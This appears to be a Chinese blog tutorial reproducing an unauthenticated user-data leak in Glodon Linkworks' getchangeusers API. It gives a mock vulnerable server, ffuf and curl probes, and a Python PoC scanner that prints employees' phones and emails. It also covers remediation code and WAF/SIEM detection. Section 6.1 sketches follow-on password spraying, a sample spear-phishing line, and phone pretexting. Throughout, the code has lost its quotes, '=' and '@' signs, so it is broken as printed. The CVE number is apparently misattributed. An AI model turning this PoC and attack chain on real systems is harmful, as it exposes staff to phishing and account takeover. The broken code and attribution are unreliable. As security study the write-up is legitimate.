1. 项目概述一次典型的企业应用信息泄露漏洞复现最近在梳理一些企业级应用的历史漏洞时广联达Linkworks的一个信息泄露漏洞引起了我的注意。这个漏洞编号为CVE-2024-50623核心问题出在一个名为getchangeusers的接口上。对于从事安全研究、渗透测试或者企业安全运维的朋友来说这类漏洞的复现和分析过程非常有价值。它不像那些利用链复杂的远程代码执行漏洞那样“炫技”但恰恰是这种看似简单的信息泄露往往能成为撕开内网防线的第一道口子为后续的横向移动和权限提升提供关键情报。广联达Linkworks作为国内建筑、工程领域广泛使用的协同办公与项目管理平台其用户群体庞大涉及大量企业核心数据和业务流程。因此针对其组件的安全研究具有很高的现实意义。本次复现的目标就是通过模拟攻击者的视角完整地走一遍漏洞发现、验证和利用的流程理解其成因、影响以及修复方案。整个过程我们会使用一个可控的测试环境确保所有操作都在合法授权的范围内进行。无论你是想学习漏洞复现的基本方法论还是希望深入了解企业应用安全测试的细节这篇记录都能提供一份清晰的“作战地图”。2. 漏洞背景与核心原理剖析2.1 广联达Linkworks与问题接口定位广联达Linkworks是一个集成度很高的企业协同管理平台它通常包含流程审批、文档管理、任务协同、即时通讯等多个模块。这类系统在设计时为了满足前后端数据交互的需求会暴露大量的API应用程序编程接口供前端页面调用。getchangeusers接口从名字上推测其功能很可能是用于获取系统内用户变更信息的列表或详情。在正常的业务逻辑中此类接口应当受到严格的访问控制。例如只有拥有特定权限如系统管理员、人事管理员的用户才能访问并且在返回数据时应对敏感信息如手机号、邮箱、身份证号后几位等进行脱敏处理。然而CVE-2024-50623漏洞的根源就在于getchangeusers接口的访问控制机制存在缺陷或者其数据返回逻辑未做任何过滤导致未经认证的攻击者或低权限用户能够直接访问该接口并获取到完整的、未脱敏的用户敏感信息列表。2.2 信息泄露漏洞的常见模式与危害信息泄露漏洞Information Disclosure是Web应用中最常见的漏洞类型之一。它不一定能直接导致服务器被控制但其危害性常常被低估。具体到本案例其危害主要体现在以下几个方面用户隐私侵犯直接泄露员工的姓名、工号、部门、手机号、邮箱等个人信息违反《个人信息保护法》等相关法律法规。社会工程学攻击素材攻击者利用获取到的真实员工姓名、部门信息可以构造出极具迷惑性的钓鱼邮件或短信大幅提高攻击成功率。内网渗透的跳板获取到的邮箱账号往往与内网域账号命名规则一致为后续的密码爆破、横向移动提供了精准的目标列表。业务逻辑漏洞挖掘基础了解系统用户结构和权限关系有助于攻击者发现更复杂的业务逻辑漏洞如越权操作。这类漏洞的产生原因多种多样除了本次案例的接口未授权访问还包括错误的服务器配置如开启目录浏览、备份文件泄露、调试信息未关闭、API响应中包含过多信息如将完整的数据库错误信息返回给前端等。注意在进行任何安全测试前必须获得目标系统所有者的明确书面授权。未经授权对任何系统进行漏洞扫描、探测或利用测试均属违法行为。本文所有操作均在自主搭建的、隔离的测试环境中完成。3. 复现环境搭建与工具准备3.1 测试环境构建为了安全、可控地复现该漏洞我们需要搭建一个模拟环境。理想情况下可以寻找存在该漏洞的Linkworks历史版本安装包在虚拟机中安装。但由于商业软件安装包不易获取且安装过程复杂我们更常用的方法是搭建一个漏洞模拟靶场。我们可以使用如Vulhub、VulnApp等开源漏洞靶场项目或者更简单地自己编写一个简单的Web应用来模拟漏洞场景。这里为了聚焦漏洞原理和复现过程我们采用后者。环境准备清单操作系统Ubuntu 22.04 LTS 或 Windows 10/11。本文以Ubuntu为例。Web服务器Apache 或 Nginx。我们选用轻量且简单的Pythonhttp.server模块方便快速演示。编程语言Python 3用于编写模拟漏洞的后端接口。测试工具Burp Suite Community必备、浏览器Chrome/Firefox、cURL命令行工具。3.2 模拟漏洞接口开发我们在测试机上创建一个目录并编写一个Python脚本来模拟存在漏洞的getchangeusers接口。# 创建项目目录 mkdir linkworks_vuln_demo cd linkworks_vuln_demo创建一个名为vuln_app.py的文件#!/usr/bin/env python3 from http.server import HTTPServer, BaseHTTPRequestHandler import json # 模拟一个包含敏感信息的用户变更数据列表 MOCK_USER_DATA [ {id: 1001, name: 张三, department: 研发部, phone: 13800138001, email: zhangsancompany.com, changeType: 新增}, {id: 1002, name: 李四, department: 财务部, phone: 13900139002, email: lisicompany.com, changeType: 调岗}, {id: 1003, name: 王五, department: 行政部, phone: 13700137003, email: wangwucompany.com, changeType: 离职}, # ... 可以添加更多模拟数据 ] class VulnHandler(BaseHTTPRequestHandler): def do_GET(self): # 模拟漏洞接口/api/getchangeusers 未授权即可访问 if self.path /api/getchangeusers: self.send_response(200) self.send_header(Content-Type, application/json) self.end_headers() response { code: 0, msg: success, data: MOCK_USER_DATA } self.wfile.write(json.dumps(response, ensure_asciiFalse).encode(utf-8)) # 模拟一个需要认证的正常接口 elif self.path /api/secure/data: auth_header self.headers.get(Authorization) if auth_header Bearer valid_token: self.send_response(200) self.send_header(Content-Type, application/json) self.end_headers() self.wfile.write(b{code:0, msg:Secure data accessed.}) else: self.send_response(401) self.end_headers() self.wfile.write(bUnauthorized) else: self.send_response(404) self.end_headers() self.wfile.write(bNot Found) def log_message(self, format, *args): # 禁止日志输出保持控制台整洁 pass if __name__ __main__: server_address (, 8000) # 监听所有地址的8000端口 httpd HTTPServer(server_address, VulnHandler) print([*] 模拟漏洞服务器启动在 http://0.0.0.0:8000) print([*] 漏洞接口GET /api/getchangeusers) try: httpd.serve_forever() except KeyboardInterrupt: print(\n[*] 服务器关闭。)运行这个脚本python3 vuln_app.py现在我们就有了一个运行在http://你的测试机IP:8000上的模拟漏洞环境。它模拟了两个接口/api/getchangeusers存在未授权访问漏洞直接返回所有用户敏感信息。/api/secure/data一个需要正确Token才能访问的安全接口用于对比。4. 漏洞探测与验证实操流程4.1 初步信息收集与接口发现在实际测试中我们通常不会事先知道getchangeusers这个接口路径。发现它的过程可能涉及多种信息收集手段目录与文件枚举使用工具如dirsearch,gobuster,ffuf对目标Web应用进行目录爆破寻找可能的API路径、备份文件、配置文件等。# 示例使用ffuf进行目录爆破 ffuf -w /path/to/wordlist.txt -u http://target.com/FUZZ -mc 200,301,302,403JS文件分析现代Web应用的前端JavaScript文件中常常硬编码或动态构造API请求的URL。使用浏览器开发者工具F12的“源代码”Sources或“网络”Network选项卡仔细查看加载的JS文件搜索api、get、list、user等关键词。流量代理与分析这是最有效的方法之一。配置浏览器代理如Burp Suite然后以普通用户身份正常使用目标系统的各个功能。在Burp的Proxy历史记录中观察所有HTTP请求特别关注/api/、/service/、/ajax/等路径下的请求寻找类似getUsers、getData、list等命名的接口。4.2 使用Burp Suite进行漏洞验证假设我们已经通过某种方式例如在JS文件中发现得知了/api/getchangeusers这个接口路径。接下来使用Burp Suite进行验证。启动Burp并配置代理打开Burp Suite在Proxy - Options中确保代理监听已开启默认127.0.0.1:8080。将浏览器代理设置为相同地址。发送测试请求在浏览器中直接访问http://测试机IP:8000/api/getchangeusers。Burp会拦截到这个请求。转发与观察在Burp的Proxy - Intercept标签页点击“Forward”将请求发送出去。然后切换到“HTTP history”标签页找到刚才的请求记录并查看响应Response。关键验证点状态码响应状态码是否为200成功响应内容响应体Response body中是否包含了完整的、未脱敏的用户敏感信息如手机号、邮箱认证缺失检查原始请求Raw Request是否缺少常见的认证头如Authorization: Bearer ...、Cookie等与需要认证的接口如我们模拟的/api/secure/data的请求进行对比。在我们的模拟环境中你会直接看到一个JSON格式的响应包含了所有模拟用户的详细信息。这初步证实了接口存在未授权访问问题。进一步利用——使用Repeater模块为了更灵活地测试我们可以将请求发送到Burp的Repeater模块。在HTTP history中右键点击该请求选择“Send to Repeater”。切换到Repeater标签页你可以修改请求方法如从GET改为POST、路径、参数、头部然后反复点击“Send”进行测试。测试越权尝试在请求中添加或修改参数例如?userId1001看是否能获取特定用户的信息或者尝试访问其他可能类似的接口如/api/getallusers。4.3 使用cURL命令行验证Burp Suite功能强大但有时在服务器命令行环境下cURL是更快捷的验证工具。# 基础验证直接请求漏洞接口 curl -v http://测试机IP:8000/api/getchangeusers # 格式化输出如果返回JSON curl -s http://测试机IP:8000/api/getchangeusers | python3 -m json.tool # 对比测试访问需要认证的接口应返回401 curl -v http://测试机IP:8000/api/secure/data-v参数可以显示详细的请求和响应头这对于分析认证机制非常有用。如果第一个命令成功返回数据而第二个命令返回401 Unauthorized这就形成了鲜明对比进一步确认了漏洞的存在。4.4 漏洞利用脚本编写PoC为了自动化验证过程或用于授权范围内的批量检测我们可以编写一个简单的Python PoC概念验证脚本。#!/usr/bin/env python3 import requests import sys import json def check_vuln(url): 检查目标URL是否存在广联达Linkworks getchangeusers信息泄露漏洞。 vuln_api /api/getchangeusers target_url url.rstrip(/) vuln_api headers { User-Agent: Mozilla/5.0 (Security Test) } try: # 设置超时避免长时间等待 resp requests.get(target_url, headersheaders, timeout10, verifyFalse) # verifyFalse 仅用于测试环境忽略SSL证书验证 resp.encoding utf-8 # 判断漏洞存在的条件状态码为200且响应内容中包含明显的用户信息字段 if resp.status_code 200: # 尝试解析JSON try: data resp.json() # 检查响应结构通常漏洞接口返回的data字段是数组且包含敏感字段 if isinstance(data, dict) and data in data: user_list data[data] if isinstance(user_list, list) and len(user_list) 0: first_user user_list[0] # 检查是否包含敏感字段如phone, email, idcard等 sensitive_keys [phone, email, idcard, mobile] if any(key in first_user for key in sensitive_keys): print(f[] 目标 {url} 可能存在信息泄露漏洞 (CVE-2024-50623)) print(f 接口{target_url}) print(f 获取到 {len(user_list)} 条用户数据。) # 可选打印前几条数据样本 print( 数据样本) for i, user in enumerate(user_list[:2]): # 只打印前2条 print(f {user}) return True # 如果返回的不是标准JSON结构但包含明显的关键词也提示 elif phone in resp.text or email in resp.text or name in resp.text: print(f[!] 目标 {url} 返回了可能包含敏感信息的明文数据请手动审查。) print(f 接口{target_url}) return True except json.JSONDecodeError: # 如果不是JSON检查响应文本内容 if len(resp.text) 100: # 响应内容较长 print(f[!] 目标 {url} 返回了非JSON格式的长文本响应请手动审查{target_url}) return False else: print(f[-] 目标 {url} 接口 {vuln_api} 返回状态码{resp.status_code}) return False except requests.exceptions.ConnectionError: print(f[-] 无法连接到目标{url}) except requests.exceptions.Timeout: print(f[-] 请求超时{url}) except Exception as e: print(f[-] 检查目标 {url} 时发生错误{e}) return False if __name__ __main__: if len(sys.argv) ! 2: print(f用法{sys.argv[0]} 目标URL) print(f示例{sys.argv[0]} http://192.168.1.100:8080) sys.exit(1) target sys.argv[1] check_vuln(target)脚本使用说明# 运行PoC脚本 python3 linkworks_poc.py http://测试机IP:8000这个脚本会自动化地发送请求、解析响应并根据预定义的规则状态码200、返回JSON格式、数据中包含敏感字段来判断漏洞是否存在。它提高了批量测试的效率。实操心得在实际漏洞挖掘中自动化PoC脚本的规则不能写得太死板。有些接口可能返回XML格式有些可能状态码是302跳转但响应体里已经有数据了。最好的PoC脚本应该具备一定的自适应能力或者至少提供“原始响应输出”模式方便测试者手动判断。此外务必在脚本中加入延迟和错误处理避免对目标造成DDoS攻击或因为单个目标超时而阻塞整个扫描队列。5. 漏洞深度分析与修复建议5.1 漏洞根因与代码层面分析根据漏洞描述和复现现象我们可以深入分析其代码层面的可能原因。这通常发生在MVC模型-视图-控制器架构的Web应用中。控制器Controller层权限校验缺失处理/api/getchangeusers请求的控制器方法可能没有添加任何权限注解或拦截器检查。例如在Spring框架中可能遗漏了PreAuthorize(hasRole(ADMIN))这样的注解在.NET中可能没有使用[Authorize(Roles Admin)]特性。错误代码示例Spring Boot风格RestController RequestMapping(/api) public class UserController { GetMapping(/getchangeusers) // 缺失 PreAuthorize 注解 public ResponseEntityListUserDTO getChangeUsers() { // 直接查询数据库并返回全部数据 ListUser users userService.getAllUsersWithChanges(); return ResponseEntity.ok(convertToDTO(users)); // DTO可能也未做脱敏 } }服务Service层或数据访问层逻辑错误即使控制器有权限校验也可能在服务层或数据访问层的方法被其他无需校验的接口错误调用或者查询语句本身没有进行权限过滤。数据传输对象DTO或序列化配置不当即使用户实体类Entity中敏感字段使用了JsonIgnore等注解但在返回给前端的特定DTO中可能又重新包含了这些字段且未做脱敏处理。路由或拦截器配置错误可能全局的安全拦截器配置存在遗漏导致/api/getchangeusers这个特定的URL路径没有被安全规则覆盖。5.2 修复方案与加固措施针对上述根因修复措施需要从多个层面入手实施严格的访问控制首要代码修复在对应的控制器方法上添加基于角色RBAC或权限的访问控制注解。确保只有授权用户如系统管理员、审计人员才能访问。GetMapping(/getchangeusers) PreAuthorize(hasAnyAuthority(USER_VIEW_ALL, AUDIT_READ)) // 明确所需权限 public ResponseEntityListUserSafeDTO getChangeUsers() { // ... 业务逻辑 }配置修复检查Web安全配置如Spring Security的SecurityFilterChain确保所有API端点特别是/api/**路径默认都需要认证并对不需要认证的公开接口如登录接口进行显式放行。应用最小数据暴露原则创建专用的、安全的DTOData Transfer Object用于API响应。在DTO中严格排除所有不必要的敏感字段如手机号、邮箱、身份证号、密码哈希等。对于必须返回的敏感信息进行脱敏处理。例如手机号显示为138****8001邮箱显示为z***ncompany.com。public class UserSafeDTO { private Long id; private String name; private String department; private String changeType; // 不包含 phone 和 email 字段 // 或者包含脱敏后的字段 private String phoneMasked; // 例如 “138****8001” private String emailMasked; // 例如 “z***ncompany.com” }输入输出验证与过滤即使通过了权限校验也要对查询参数进行验证防止SQL注入或通过参数进行的越权查询例如通过修改userId参数查询他人信息。在全局响应处理器中可以添加一层过滤确保意外泄露的敏感字段在最终输出前被清除或替换。安全开发生命周期SDL集成代码审计将接口权限审计纳入常规代码审查流程。自动化扫描在CI/CD流水线中集成静态应用安全测试SAST和动态应用安全测试DAST工具自动检测未授权访问和敏感信息泄露问题。定期渗透测试聘请专业安全团队或使用自动化工具对系统进行定期的渗透测试主动发现此类漏洞。5.3 企业级安全防护补充对于使用广联达Linkworks或其他类似商业软件的企业在等待官方补丁的同时可以采取以下临时缓解措施网络层访问控制在防火墙或WAFWeb应用防火墙上设置规则限制访问/api/getchangeusers等敏感接口的源IP范围例如只允许管理员的IP或公司内网IP访问。WAF规则部署在WAF上自定义规则拦截对疑似敏感信息泄露接口的请求并记录日志告警。日志监控与告警加强应用日志和网络日志的监控对短时间内大量访问敏感接口的异常行为进行告警。及时更新与补丁管理密切关注广联达官方发布的安全公告和补丁建立完善的补丁管理流程在测试后第一时间安排更新。6. 漏洞复现的延伸思考与防御视角6.1 从攻击者视角看信息泄露的利用链复现一个漏洞不是终点理解攻击者如何利用它更为重要。假设攻击者通过此漏洞获取了500条员工信息他接下来可能会信息整理与关联将获取到的姓名、邮箱、部门信息整理成表格。利用邮箱前缀如zhangsan推测公司的内部账号命名规则可能是姓名全拼。密码喷洒攻击针对推测出的内网账号如zhangsan尝试使用一些通用弱密码如Company2024、Welcome123、季节年份等进行登录。由于是从外网获取的邮箱攻击目标可能是公司的VPN、OA邮箱系统或其他对外服务。鱼叉式钓鱼邮件利用真实的部门和人名编写极具针对性的钓鱼邮件。例如“李四我是研发部的张三这是你要的Q2项目财务报表请查收。”附件或链接包含木马。社会工程学直接拨打获取到的手机号冒充IT支持人员以“系统升级需要验证密码”为由套取凭证。这个简单的信息泄露漏洞就像丢了一把钥匙虽然不知道具体开哪扇门但攻击者可以拿着它去尝试所有看起来像锁孔的地方。6.2 防御者如何构建检测与响应机制作为防御方我们不能只依赖软件厂商的补丁。需要建立主动的检测和响应能力异常API访问检测在SIEM安全信息和事件管理系统中建立针对类似getchangeusers、getallusers、download等敏感API路径的访问监控。关注以下异常高频访问非管理员IP在短时间内大量请求敏感接口。非常规时间访问在深夜或节假日发起的访问。无Referer或异常UA的访问直接通过工具发起的API调用通常没有正常的页面RefererUser-Agent也可能是工具标识。数据外泄监测部署DLP数据防泄漏系统或使用网络流量分析工具监测是否有大尺寸的JSON/XML数据包从内部服务器流向外部非信任IP。蜜罐与诱饵可以在不重要的服务器上部署一些伪装成真实API的“蜜罐”接口一旦被访问立即告警这能有效发现内网或外网的扫描行为。6.3 安全测试方法论总结通过这次复现我们可以提炼出一套针对“未授权访问/信息泄露”类漏洞的通用测试方法资产发现使用扫描器、爬虫、手工浏览等方式尽可能全面地收集目标的所有接口、参数、功能点。权限测试矩阵未认证Anonymous直接访问所有收集到的接口。低权限用户以一个普通用户的身份如新注册账号访问所有接口特别是那些看起来像管理功能的接口。横向越权使用用户A的Token尝试访问本应属于用户B的数据如修改userIdB的参数。纵向越权使用普通用户权限尝试访问管理员接口。参数变异测试对接口参数进行FUZZ测试尝试通过修改ID、类型等参数访问到超出权限范围的数据。响应深度分析不要只看状态码。仔细检查每个响应的头部看是否有调试信息、服务器版本泄露、响应体看是否包含错误详情、堆栈跟踪、敏感数据、响应时间盲注可能导致的延时。踩坑记录在一次实际测试中我发现一个接口返回状态码403禁止访问但响应体里却完整地写着“对不起管理员admin您无权查看财务部的数据”。这实际上泄露了当前登录的用户名admin和受保护的资源名称财务部为后续的攻击提供了线索。所以永远不要相信状态码一定要仔细阅读完整的响应内容。漏洞复现的价值远不止于验证一个CVE编号。它是一次完整的攻防思维训练。从信息收集到漏洞验证从原理分析到修复建议再到如何利用和如何防御这个闭环过程能极大地提升我们对安全的理解深度和实战能力。对于企业而言定期对自身系统进行类似的“健康检查”远比在出事后再进行补救要主动和有效得多。